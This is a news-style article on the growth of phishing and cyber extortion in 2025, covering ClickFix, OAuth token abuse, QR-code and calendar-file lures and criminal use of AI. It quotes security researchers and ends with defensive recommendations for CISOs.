During 2025, cyber extortion continued to grow, driven by more active phishing gangs, and increasingly sophisticated attacks.
According to the Security Navigator report from Orange Cyberdefense, the number of cyber extortion victims grew by 45% between October 2024 and September 2025.
The number of attacks, especially those which deploy ransomware, is being driven by the growth in cybercrime-as-a-service. Orange said that the number of distinct cybercrime groups has tripled since 2020.
Phishing attempts are growing in volume partly because organized crime groups no longer need technical knowledge to launch ransomware or other forms of cyber extortion: they can simply buy in the services they need.
This ongoing trend is combined with emerging social engineering techniques, including multi-channel attacks, deep fakes and ClickFix exploits.
Cybercriminals are also using AI to fine tune their operations, with more persuasive personalization, better translation into other languages and easier reconnaissance against high-value targets. It is becoming harder to detect and block attacks, and harder to train workforces to spot suspicious activity.
“If you look at the UK's own data, phishing is still the main way British organizations are being compromised, but the tactics continue to evolve,” warned Rik Ferguson, VP Security Intelligence at Forescout.
“The government's Cyber Security Breaches Survey 2025 shows phishing remains the most common attack type. What changed in 2025 is less that phishing works, and more how it works.”
According to Ferguson, phishing is now as much of an infrastructure problem as a “content” problem. Forescout’s Vedere Labs pointed to how attackers are using Telegram bots, link forwarding services and front-end hosting to scale up phishing campaigns.
Researchers also point to threat actors using domains, including typosquatted domains and decommissioned infrastructure, to spread malware.
From OAuth Exploits to QR Code Malware: Technical Threats Poised to Grow in 2026
Authorize-app and token hopping attacks gain OAuth permissions and abuse app consents are able to refresh tokens across Microsoft 365, SaaS applications and other infrastructure, such as Slack. These allow attackers to maintain access and move laterally between applications, even after password resets. Researchers expect these attacks to grow in 2026.
ClickFix prompts users to visit fake update or error pages, then run a malicious PowerShell or terminal commands. In this case, the attacker convinces the end user to act in a way that bypasses conventional controls.
ClickFix attacks alone grew five-fold in the first half of 2025, according to security researchers at ESET.
Other emerging attacks exploit QR codes. According to Rafe Pilling, director of threat intelligence at Sophos, phishing groups are again using QR codes to distribute malicious payloads, as they bypass users’ increased caution about clicking unfamiliar links.
“QR codes and adversary the middle phishing has become the trend for getting useful for credentials and authenticate session tokens out of organizations,” Pilling said.
Security researchers have also observed an increase in phishing spread via .ics calendar files, either through malicious links, or code embedded in the ICS file itself. The invitations might also prompt the user to call a WhatsApp number.
The Growing AI Threat
Perhaps the greatest threat comes from, or will come from, AI which can be used to fine tune existing malicious campaigns and create convincing deepfakes to manipulate users and bypass identity checks.
Already, phishing groups are using LLMs for tasks including crafting phishing emails, removing telltale grammar and syntax errors, and for translation into a wider range of languages. This enables cybercrime gangs to increase their geographical reach, for relatively little effort.
“AI has increased the accuracy of a lot of phishing emails. Everybody was familiar with phishing emails you could spot it by the bad grammar and the poor formatting and stuff like that. Previously, a good attacker could create a good phishing email. All AI has done is allowed the attacker to generate good quality phishing emails at speed and at scale,” explained Richard Meeus, EMEA director of security strategy and technology at Akamai.
Alongside making phishing emails more convincing, AI is also being used for 'synthetic identity scams'. These scams, which often use deepfake tools, voice cloning and AI-generated imagery are linked to CEO/CFO fraud and impersonation, and withfake job applications from foreign agents, posing as remote workers.
Andrew Bud, CEO and founder at biometric security firm iProov, noted that while passkeys have been successful over the past year in cutting phishing attacks, fake identities could be used for passkey recovery.
AI is also being used to fine-tune, and speed up, more mundane phishing attacks.
“In 2026, we expect to see organized crime groups automate workflows and outsource more tasks using AI agents in their attacks, especially preparatory tasks like researching victims to target,” said Alex Holland, principal threat researcher at HP’s Security Lab. He also expects to see criminal hackers use AI, and especially large language models (LLMs), for more complex tasks, including vulnerability discovery.
“AI assistance will help threat actors to scale their operations, making campaigns more efficient by reducing the resources and skills attackers need to breach targets,” he said.
How CISOs Can Tackle Phishing and Extortion Trends
For CISOs, wider cybersecurity and fraud prevention teams, recent developments in phishing and cyber extortion schemes will pose real challenges in the coming year.
“User awareness still matters, but it isn’t enough,” cautioned Forescout’s Ferguson. “In a world of deepfake video, cloned voices and perfect written English, your control point can’t be ‘would our users spot this?’”
He recommended that businesses build in out of band verification to high-risk workflows and add elevated levels of security to channels such as SMS, collaboration tools and helpdesk chats.
At Sophos, Pilling recommended tightening up on MFA processes, to reduce the risk of adversary in the middle phishing.
For CISOs, the priority is to harden networks and reduce the scope for attackers to move laterally across the organization and make it harder for cybercriminals to take over accounts and forge identities.
The approach must go hand in hand with maintaining basic cyber hygiene and security awareness across the business.
Tried and tested, low-technology attacks, including basic email phishing, continue to pose a risk. This looks set to be the case, even as malicious actors move to ever more sophisticated ways to breach defenses.